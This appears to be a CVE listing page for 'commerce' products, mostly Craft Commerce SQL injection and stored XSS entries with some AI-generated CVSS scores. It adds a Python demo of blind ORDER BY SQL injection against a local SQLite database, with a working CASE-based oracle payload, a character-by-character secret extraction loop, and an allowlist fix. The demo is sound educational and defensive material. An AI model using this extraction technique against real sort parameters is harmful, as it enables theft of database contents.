
commerce — Vulnerabilities & Security Advisories (22)

All 22 CVE entries filed under the product name "commerce", with AI-generated Chinese analysis, references, and proofs of concept where available. Note that the name groups two unrelated products: Craft Commerce (the plugin for Craft CMS, 20 entries) and HCL Commerce (2 entries).

Vendor: n/a (not a single vendor; see the product note above)

| CVE ID | Title | CWE | CVSS | Severity | Published |
|---|---|---|---|---|---|
| CVE-2026-32272 | Craft Commerce: Blind SQL Injection via hasVariant/hasProduct | CWE-89 | 9.8 | - | 2026-04-13 |
| CVE-2026-32271 | Craft Commerce: SQL Injection can lead to Remote Code Execution via TotalRevenue Widget | CWE-89 | 8.8 | - | 2026-04-13 |
| CVE-2026-32270 | Craft Commerce: Unauthenticated information disclosure in `commerce/payments/pay` can leak some customer order data on anonymous payments | CWE-200 | 5.3 | - | 2026-04-13 |
| CVE-2026-31867 | Craft Commerce has a Potential IDOR in Commerce carts | CWE-639 | 8.1 (AI) | High (AI) | 2026-03-11 |
| CVE-2026-29177 | Craft Commerce has Stored XSS in Craft Commerce Order Details Slideout | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-03-10 |
| CVE-2026-29176 | Craft Commerce has Stored XSS in Inventory Location Name | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-03-10 |
| CVE-2026-29175 | Multiple Stored XSS in Commerce Inventory Page Leading to Session Hijacking | CWE-79 | 6.1 (AI) | Medium (AI) | 2026-03-10 |
| CVE-2026-29174 | Craft Commerce has a SQL Injection in Commerce Inventory Table Sorting | CWE-89 | 8.8 (AI) | High (AI) | 2026-03-10 |
| CVE-2026-29173 | Craft Commerce has Stored XSS while updating Order Status from Orders Table | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-03-10 |
| CVE-2026-29172 | Craft Commerce has a SQL Injection in Commerce Purchasables Table Sorting | CWE-89 | 8.8 (AI) | High (AI) | 2026-03-10 |
| CVE-2026-25522 | Craft Commerce has Stored XSS in Shipping Zone (Name & Description) Fields Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25490 | Craft Commerce has Stored XSS in Inventory Location Address Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25489 | Craft Commerce has Stored XSS in Tax Zones (Name & Description) Leading to Potential Privilege Escalation | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25488 | Craft Commerce has Stored XSS in Tax Categories (Name & Description) Fields Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25487 | Craft CMS has Stored XSS in Tax Rates Name Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25486 | Craft Commerce has Stored XSS in Shipping Methods Name Field Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25485 | Craft Commerce has Stored XSS in Shipping Categories (Name & Description) Fields Leading to Potential Privilege Escalation | CWE-79 | 4.8 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25484 | Craft Commerce has Stored XSS in Product Type Name | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25483 | Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2026-25482 | Craft Commerce has Stored DOM XSS in Order Status Name (Reflects in "Recent Orders" Dashboard Widget) | CWE-79 | 5.4 (AI) | Medium (AI) | 2026-02-03 |
| CVE-2024-23576 | HCL Commerce is potentially affected by a denial of service and information disclosure vulnerability | - | 7.1 | High | 2024-05-13 |
| CVE-2021-27741 | HCL Commerce code issue vulnerability | - | 9.1 | - | 2021-08-13 |

Values marked (AI) are CVSS scores and severities produced by the site's AI-generated analysis rather than taken from the published advisory; "-" means the site lists no value. The CWE column is the weakness identifier the site attaches to each title.
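The two "Table Sorting" entries above (CVE-2026-29174 and CVE-2026-29172) and the blind injection entry (CVE-2026-32272) share one CWE-89 pattern that recurs in admin listing endpoints: a sort column or direction taken from the request is concatenated into an ORDER BY clause, where prepared-statement parameters cannot be used. The example below is an added illustration of that class in Python against an in-memory SQLite database; it is not Craft Commerce code and makes no claim about how those specific CVEs were triggered or fixed. The table names, columns, the `secret` value and the row data are constructed for the demo.

```python
import sqlite3
import string

# Constructed sample data for the demo; not taken from any real deployment.
ROWS = [
    (1, "Widget", 9.99),
    (2, "Gadget", 4.50),
    (3, "Doohickey", 19.00),
]
SECRET = "s3cret"  # stands in for any value an attacker should not be able to read


def _db() -> sqlite3.Connection:
    """Fresh in-memory database with a listing table and an unrelated sensitive table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE purchasables(id INTEGER, title TEXT, price REAL)")
    con.executemany("INSERT INTO purchasables VALUES (?, ?, ?)", ROWS)
    con.execute("CREATE TABLE admin(secret TEXT)")
    con.execute("INSERT INTO admin VALUES (?)", (SECRET,))
    return con


def list_vulnerable(sort: str, direction: str = "ASC") -> list[int]:
    """Vulnerable pattern (CWE-89): sort column and direction come straight from
    the request and are concatenated into ORDER BY, so any SQL expression is accepted."""
    sql = f"SELECT id FROM purchasables ORDER BY {sort} {direction}"
    return [row[0] for row in _db().execute(sql)]


ALLOWED_SORT = {"id", "title", "price"}
ALLOWED_DIR = {"ASC", "DESC"}


def list_hardened(sort: str, direction: str = "ASC") -> list[int]:
    """Hardened pattern: ORDER BY cannot take bound parameters, so the only safe
    approach is an allowlist of column names and directions; anything else is rejected."""
    direction = direction.upper()
    if sort not in ALLOWED_SORT or direction not in ALLOWED_DIR:
        raise ValueError("invalid sort parameter")
    sql = f"SELECT id FROM purchasables ORDER BY {sort} {direction}"
    return [row[0] for row in _db().execute(sql)]


def blind_probe(pos: int, guess: str) -> bool:
    """Boolean oracle for the vulnerable endpoint: the CASE expression sorts by id
    when the guessed character matches and by -id otherwise, so the row order
    alone reveals one bit without any error message or data in the response."""
    payload = (
        f"(CASE WHEN (SELECT substr(secret, {pos}, 1) FROM admin) = '{guess}' "
        f"THEN id ELSE -id END)"
    )
    return list_vulnerable(payload) == [1, 2, 3]


def recover_secret(max_len: int = 16) -> str:
    """Drive the oracle character by character, the way a blind ORDER BY injection
    is exploited in practice; stops when no candidate matches (end of string)."""
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if blind_probe(pos, ch):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    print("legit sort:", list_vulnerable("price"))
    print("recovered via ordering oracle:", recover_secret())
    try:
        list_hardened("(SELECT 1)")
    except ValueError as exc:
        print("hardened endpoint rejected payload:", exc)
```

The point to carry away for triage: a "sort" or "orderBy" parameter that reaches the query unchecked is a full injection sink even when every other value on the page is bound as a parameter, and the fix is an allowlist mapping request values to known column names, not escaping.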
